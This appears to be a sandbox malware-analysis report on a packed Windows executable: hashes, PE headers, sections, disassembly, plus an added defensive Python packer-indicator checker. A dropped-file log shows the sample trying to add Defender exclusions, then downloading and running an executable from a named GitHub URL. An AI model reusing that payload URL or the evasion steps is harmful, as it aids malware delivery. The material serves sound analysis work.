                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):836
                                                                                                                                                                                                                        Entropy (8bit):5.159614252207021
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:/cPwWXV9prcrmBHslgT9lCuABAT2uoB7HHHHHHHYqmffffffo:EYWjpPKlgZ01BASuSEqmffffffo
                                                                                                                                                                                                                        MD5:B680E9EF55A469440AC0E03761023CE5
                                                                                                                                                                                                                        SHA1:824EC45A1CBE6A49D737CCB571B6F4CFBE54E1A5
                                                                                                                                                                                                                        SHA-256:F17E9B77C6F608AF3029F07EC8C93F4C46871A5CBD6C07999C16E289CFE9CF40
                                                                                                                                                                                                                        SHA-512:23FED994F770C03438A89122D2310D276D0A9FA01FA938FD3D32941CC68B3F8A153A037DDDF5755FA0558600E64D234F5C7B85F28F5C083113D0243C8AEB92B7
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                        Preview:)]}'.["",["big lots closing stores","vexbolts tiktok live follower count","6th generation fighter jets china","whatsapp 2025","tennessee vols football mike matthews","polar vortex weather forecast","earth magnetic field","nyt crossword clues"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":1543028498608735003,"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1395)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):117446
                                                                                                                                                                                                                        Entropy (8bit):5.490775275046353
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:T2yvefrtJUEgK3Cvw3wWs/ZuTZVL/G1kL:T2y4tJbDK0L/G1kL
                                                                                                                                                                                                                        MD5:942EA4F96889BAE7D3C59C0724AB2208
                                                                                                                                                                                                                        SHA1:033DDF473319500621D8EBB6961C4278E27222A7
                                                                                                                                                                                                                        SHA-256:F59F7F32422E311462A6A6307D90CA75FE87FA11E6D481534A6F28BFCCF63B03
                                                                                                                                                                                                                        SHA-512:C3F27662D08AA00ECBC910C39F6429C2F4CBC7CB5FC9083F63390047BACAF8CD7A83C3D6BBE7718F699DAE2ADA486F9E0CAED59BC3043491EECD9734EC32D92F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        URL:"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0"
                                                                                                                                                                                                                        Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);.var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);ma=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}};.ma("Symbol",function(a){if(a)return a;var b
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):29
                                                                                                                                                                                                                        Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                        MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                        SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                        SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                        SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                        Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):132768
                                                                                                                                                                                                                        Entropy (8bit):5.4371263615588425
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:fLkJQ7O4N5dTm+syHEt4W3XdQ4Q6PuSr/nUW2i6o:fOQ7HTt/sHdQ4Q6PDfUW8o
                                                                                                                                                                                                                        MD5:8F92E8E0047B7B802A8C5D230575F66F
                                                                                                                                                                                                                        SHA1:BA6D2351736BC0B3B1BA89B8ECB84CEACA0A19D3
                                                                                                                                                                                                                        SHA-256:B9BD43587F4547E5B411C10C772C48791B1802D33209A1161F30F220B7066469
                                                                                                                                                                                                                        SHA-512:8769099537EDF8E183B59EA6C1ABEDEF894D733ECC5B08F3A892F33283452BB03168C64E74ED9238E506E66F576A892EF6DFDC1926ACDBB5D8736965CCE530FE
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                        Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2410)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):175897
                                                                                                                                                                                                                        Entropy (8bit):5.549876394125764
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:t0PuJ7UV1+ApsOC3Ocr4ONnv4clQfOQMmzIWrBQoSpFMgDuq1HBGANYmYALJQIfr:t0PuJQ+ApsOOFZNnvFlqOQMmsWrBQoSd
                                                                                                                                                                                                                        MD5:2368B9A3E1E7C13C00884BE7FA1F0DFC
                                                                                                                                                                                                                        SHA1:8F88AD448B22177E2BDA0484648C23CA1D2AA09E
                                                                                                                                                                                                                        SHA-256:577E04E2F3AB34D53B7F9D2F6DE45A4ECE86218BEC656B01DCAFF1BF6D218504
                                                                                                                                                                                                                        SHA-512:105D51DE8FADDE21A134ACA185AA5C6D469B835B77BEBEC55A7E90C449F29FCC1F33DAF5D86AA98B3528722A8F533800F5146CCA600BC201712EBC9281730201
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTu0yU9RTMfNNC-LVUmaaNKwIO136g"
                                                                                                                                                                                                                        Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.Ui=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Vi=class extends _.Q{constructor(a){super(a)}};.}catch(e){_._DumpException(e)}.try{.var Wi,Xi,aj,dj,cj,Zi,bj;Wi=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};Xi=function(){_.Ka()};aj=function(a,b){(_.Yi||(_.Yi=new Zi)).set(a,b);(_.$i||(_.$i=new Zi)).set(b,a)};dj=function(a){if(bj===void 0){const b=new cj([],{});bj=Array.prototype.concat.call([],b).length===1}bj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ej=function(a,b,c){a=_.rb(a,b,c);return Array.isArray(a)?a:_.Ac};._.fj=function(a,b){a=2&b?a|2:a&-3;return(a|32)&-2049};_.gj=function(a,b){a===0&&(a=_.fj(a,b));return a|1};_.hj=function(a){return!!(2&a)&&!!(4&a)||!!(2048&a)};_.ij=function(a,b,c){32&b&&c||(a&=-33);return a};._.lj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ej(a,b,d);var k=h[_
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):5162
                                                                                                                                                                                                                        Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                                                                        MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                        SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                        SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                                                                        SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
                                                                                                                                                                                                                        Preview:.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):1660
                                                                                                                                                                                                                        Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                        MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                        SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                        SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                        SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):651
                                                                                                                                                                                                                        Entropy (8bit):5.005300745133476
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:clyD3Cg81ye4A28AArWII2SGN6TaWyL09Wy+621QYpTNfjLIayGNT:nDp81sA3CII2S7TaF094dj8ay+
                                                                                                                                                                                                                        MD5:4CE88B8F30E3F8A3EEA68AB1E36F2C93
                                                                                                                                                                                                                        SHA1:3666EC0F669828337C70395AEACF5E3345DD9B20
                                                                                                                                                                                                                        SHA-256:EA6539794748C54FD71C240FBEC387EB9950437C45EEA8C45D5FDA5053710D60
                                                                                                                                                                                                                        SHA-512:0C449FDD18E0496A1BACA562BBD10E63DCF97B04B24DF4A56DDDE80BE7B0A263C166B9ECF07A530D2ED393F421FAB23A4BE141BA79FBD3D5B89D582A4452F7CE
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:Welcome to the 'Guess the Number' game!..I've picked a number between 1 and 100. Try to guess it!..Enter your guess: .Time's up! The correct number is 66...Congratulations! You guessed the number 66 in 1 attempts!..Folder 'YQNZByFp' created successfully at C:\...Failed to add folder to Microsoft Defender exclusions. Exit code: 1..Failed to add folder 'Users' to Microsoft Defender exclusions. Exit code: 1..Downloading file from https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/jyidkjkfhjawd.exe.....File downloaded successfully to C:\YQNZByFp\jyidkjkfhjawd.exe...Running file C:\YQNZByFp\jyidkjkfhjawd.exe.....File executed successfully...

Process:C:\Windows\System32\schtasks.exe
File Type:ASCII text, with CRLF, CR line terminators
Category:dropped
Size (bytes):27
Entropy (8bit):3.7541634277688805
Encrypted:false
SSDEEP:3:R/wCu3cov:R/wHZv
MD5:F8AED8C00E9E1A62294ECA2A412564A3
SHA1:290081C4084D420572397AB514A9AD638BB7287F
SHA-256:8ECDC0C25D6979A673BCD2342A543E0C63056F8CD053D5C8A2B8F5F74355E1D7
SHA-512:A2C1CE924FD68DE7883F31B1C29F698A5A9ED26C5CB42F6340E19CF3FCD78EDC969D977FD9DEA064E32B6E448E51B4CE2AF187623ACA809821298C23B19B13EA
Malicious:false
Preview:ERROR: Access is denied....

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.950439382610089
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:5EfYBe3nch.exe
File size:1'858'048 bytes
MD5:2ba2329d40af33806efdb0bbe5aeb0ad
SHA1:31c237c3d02833010e8788c653e03c8637c4927f
SHA256:cdf06ee922f209a5ea0f3a2f05acc8813e0cc98384493a54373cc246e8ad1095
SHA512:205466f83a5a82967d71a5799bfa1e0a99ff836e4943e0df2a6b6a888d4132b36bf3219a1659e8ae7b02643ec2739dd8670dae993af7116aefeeee68035f2a9a
SSDEEP:49152:EtagWfvpLIVOXhJRTgNoGOHEjSrIGKYwPmm:EcHfyVOxJKiGOHEesGKhPmm
TLSH:4385336F2C95ACFEE7D907748CB3466EE3BD6B4242DE172C2B4738D74814202D945A8B
File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L... .pg..............................I...........@...........................I.....Z7....@.................................Y@..m..
Icon Hash:90cececece8e8eb0
Entrypoint:0x899000
Entrypoint Section:.taggant
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:0x67701720 [Sat Dec 28 15:20:00 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:2eabe9054cad5152567f0699947a2c5b
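The header fields above show the classic packed-binary profile: whole-file entropy of 7.95 out of a possible 8, an entrypoint (0x899000) that sits in a section named .taggant rather than .text, and, per the signature list, section rights that change at runtime. As an added example (not Joe Sandbox's code, and not operating on the real sample, which is not reproduced here), the pure-Python check below reads only the PE headers, computes per-section entropy, locates the section that holds the entrypoint and reports the same kind of indicators. It works on any PE32 or PE32+ file; so that it runs offline it also builds a constructed two-section PE skeleton that mirrors this layout (a zero-filled .text and a pseudo-random, writable+executable .taggant holding the entrypoint). The skeleton's addresses, the 7.0 entropy threshold and the list of "standard" code section names are my assumptions.

```python
import math
import random
import struct
from collections import Counter, namedtuple
from dataclasses import dataclass
from typing import List, Optional

IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE = 0x00000020, 0x20000000
IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE = 0x40000000, 0x80000000


@dataclass
class Section:
    name: str
    va: int         # RVA the section is mapped at
    vsize: int
    raw_size: int
    flags: int
    entropy: float  # Shannon entropy of the raw bytes, 0..8 bits per byte


PEInfo = namedtuple("PEInfo", "image_base entry_rva sections")


def shannon_entropy(buf: bytes) -> float:
    if not buf:
        return 0.0
    n = len(buf)
    return -sum((c / n) * math.log2(c / n) for c in Counter(buf).values())


def parse_pe(data: bytes) -> PEInfo:
    """Header-only walk: DOS header -> PE signature -> COFF -> optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError(f"unknown optional header magic {magic:#x}")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    # PE32 (0x10B) keeps ImageBase as a DWORD at +28; PE32+ (0x20B) drops BaseOfData and has a QWORD at +24
    image_base = (struct.unpack_from("<I", data, opt + 28)[0] if magic == 0x10B
                  else struct.unpack_from("<Q", data, opt + 24)[0])
    sections = []
    for i in range(nsec):
        off = opt + opt_size + 40 * i
        name, vsize, va, rsize, rptr, _, _, _, _, flags = struct.unpack_from("<8sIIIIIIHHI", data, off)
        raw = data[rptr:rptr + rsize]
        sections.append(Section(name.rstrip(b"\0").decode("ascii", "replace"),
                                va, vsize, rsize, flags, shannon_entropy(raw)))
    return PEInfo(image_base, entry_rva, sections)


def entry_section(info: PEInfo) -> Optional[Section]:
    for s in info.sections:
        if s.va <= info.entry_rva < s.va + max(s.vsize, s.raw_size):
            return s
    return None


def packer_indicators(info: PEInfo, high_entropy: float = 7.0) -> List[str]:
    """Heuristics, not proof; the threshold is an assumption. Each hit is one line of evidence."""
    hits = []
    es = entry_section(info)
    if es is None:
        hits.append("entrypoint lies outside every section")
    elif es.name not in (".text", "CODE"):
        hits.append(f"entrypoint {info.image_base + info.entry_rva:#x} in non-standard section {es.name!r}")
    for s in info.sections:
        if s.entropy >= high_entropy:
            hits.append(f"section {s.name!r} entropy {s.entropy:.2f} (likely compressed or encrypted)")
        if s.flags & IMAGE_SCN_MEM_WRITE and s.flags & IMAGE_SCN_MEM_EXECUTE:
            hits.append(f"section {s.name!r} is writable and executable")
        if any(not (ch.isalnum() or ch in "._$") for ch in s.name):
            hits.append(f"section name {s.name!r} contains special characters")
    return hits


def build_sample_pe(seed: int = 1337) -> bytes:
    """Constructed PE32 skeleton shaped like the sample above (headers only, directories zeroed; not loadable)."""
    rng = random.Random(seed)
    file_align, sect_align, hdr_size = 0x200, 0x1000, 0x400
    text_raw = bytes(file_align)                                             # entropy 0.0
    taggant_raw = bytes(rng.getrandbits(8) for _ in range(8 * file_align))   # entropy close to 8
    rx = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
    layout = [(b".text", 0x1000, text_raw, rx), (b".taggant", 0x2000, taggant_raw, rx | IMAGE_SCN_MEM_WRITE)]
    entry_rva = 0x2000                                                       # first byte of .taggant
    dos = b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40)                      # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(layout), 0, 0, 0, 224, 0x0102)  # i386, EXECUTABLE|32BIT
    opt = struct.pack("<HBBIIIIIIIII", 0x10B, 14, 0, len(text_raw), len(taggant_raw), 0,
                      entry_rva, 0x1000, 0x2000, 0x400000, sect_align, file_align)
    opt += bytes(224 - len(opt))
    hdrs, body, rptr = b"", b"", hdr_size
    for name, va, raw, flags in layout:
        hdrs += struct.pack("<8sIIIIIIHHI", name, len(raw), va, len(raw), rptr, 0, 0, 0, 0, flags)
        body += raw
        rptr += len(raw)
    head = dos + b"PE\0\0" + coff + opt + hdrs
    return head + bytes(hdr_size - len(head)) + body


if __name__ == "__main__":
    print("\n".join(packer_indicators(parse_pe(build_sample_pe()))))
```

Pass any real PE to parse_pe() (for instance `parse_pe(open(path, "rb").read())`) to get the same report. On a sample like the one above the entrypoint-section and entropy hits together are the signal to expect an unpacking stage rather than to reason from the static import hash alone.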

Instruction (entrypoint disassembly; the repeated "add byte ptr [eax], al" lines are the decoding of zero bytes, 00 00, i.e. padding or data rather than code)
jmp 00007FD6691C13BAh
pabsb mm0, qword ptr [eax]
add byte ptr [eax], al (repeated 2 times)
jmp 00007FD6691C33B5h
add byte ptr [ebx], cl
or al, byte ptr [eax]
add byte ptr [eax], al (repeated 2 times)
add byte ptr [eax], dh
add byte ptr [eax], al (repeated 4 times)
add al, byte ptr [eax]
add byte ptr [eax], al (repeated 6 times)
add byte ptr [ebx], cl
or al, byte ptr [eax]
add byte ptr [eax], al (repeated 62 times)
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al (repeated 2 times)
adc byte ptr [eax], al
add byte ptr [eax], al (repeated 3 times)
add cl, byte ptr [edx]
add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x54059 | 0x6d | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x53000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x541f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
- | 0x1000 | 0x52000 | 0x26000 | 6d3c230488b2120399595bf4cbf75c76 | False | 0.9998972039473685 | data | 7.98283360449281 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x53000 | 0x2b0 | 0x400 | fe67bb2a9df3150b9c94de8bd81ed8a0 | False | 0.3603515625 | data | 5.186832724894366 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x54000 | 0x1000 | 0x200 | 39a711a7d804ccbc2a14eea65cf3c27e | False | 0.154296875 | data | 1.0789976601211375 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
